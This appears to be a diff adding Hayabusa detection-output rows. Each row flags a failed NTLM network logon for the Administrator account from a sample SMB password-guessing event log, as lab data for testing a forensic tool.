+2016-09-20 01:51:45.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5aYRnzirSj0PNXAE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8s9xJ659geFHOlY4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.154 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yBQdyO0diiFixwlx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vzULtccOFnLIRiVM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1pDEGzqTAyUab5P8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.274 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gomgb26W9qFacRr7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.318 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GXOcDu88S5c5VwwV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: WHRnzgQkfAhsUguj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: A0Q9ZIaRK43W9apv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2xvriGeIlDwtzS36  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.498 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pDYTFqeJC61Nneef  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0LNR7xCHW9x2q2qc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.578 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AE4EBj8X5IfXO8ZZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2BEOSGw6TjZf9GWS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.679 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UCxe24uL4A6R9kgZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: F8v4DcIRkx43KCIs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CY2buVupQ5oR1Cp5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: f6c3MlpMEzkCVud2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:45.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: E2wV6op9AU4paDXp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BNn6aywSs67hVAO2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wUa03SIX69WCIYbp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.158 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zYi4TB42B2VQm5Tr  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.204 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9mnUbGMnlrOR8Tv4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CJGMWqgmbXABdPvB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2W9BbDYgC6vhqU3o  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q6DYsaih1Yhb2uOD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q4o93QpJL4pxx94q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lQf1OsHb4lpgMPbl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HcJUYelneVqBQjr9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I0d6daEeIadJRbBI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: SQ1hvZeT9aulbu4g  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 75RBCjr2eRDLhTqW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.700 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: maMlpuzhleuQHhIo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AkpNfbOHUr7cY52z  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: R7SUyYbLPfPAGUfw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 7clwftf7R0uNbqJ9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IsIyPcMAPnlxJa12  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4CKcyo1Ec4rs3Z2g  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:46.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZlzKvZLO8CDotkbE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.010 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EyRpYYtmD8389Yvp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: t3Pg0H9Gncoyr45m  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zksaaJ7Z1wuy4PMx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.154 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3WdYAEdfWxLdM1rh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VyYFJRy0cxPfqDFh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Hv2Lz1h1bG6UatVR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FLKPLfEe3PpEzRNc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZJWv7ggzCSyEznOI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZUtR9CNfKMHQMd7T  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.433 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6fYNHuRTqi15cRkL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DvxZHwJwrBYXlEyv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jscJTJjhKvCtDl8q  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.575 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mZEIEjcimMyHWUsp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 30OdVRH9ZATLezsR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TJ1OSBVZHKmyOzj8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.694 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JanG6Q0oYpTdm9mC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PWCwDYL3T7TAdb0J  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: mRdyZaio1HjUKlNQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VjiRnExy9TzZTG0R  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ztUyQpl8c9RoAr1j  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: jC23QAFM07q7cfVo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:47.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TSM8lmdOFoDslQNa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sGZaUGAT1oXmnGLB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZMNo21pTA67pb7Go  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EiTZCqK3m4icL1Vi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZaZ2mnoihX1Ec4di  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ihm9zaXkmWklXk4u  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yLIZ3tlw9VlQmK28  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GVHzJHTi55NbxXYY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1FROeEnMLna2fTTH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pio6ZZ9pV0pS2Whi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: h1aD2w5U5K9ND5HV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:48.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zF8Jb4GpG4D3xn9i  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
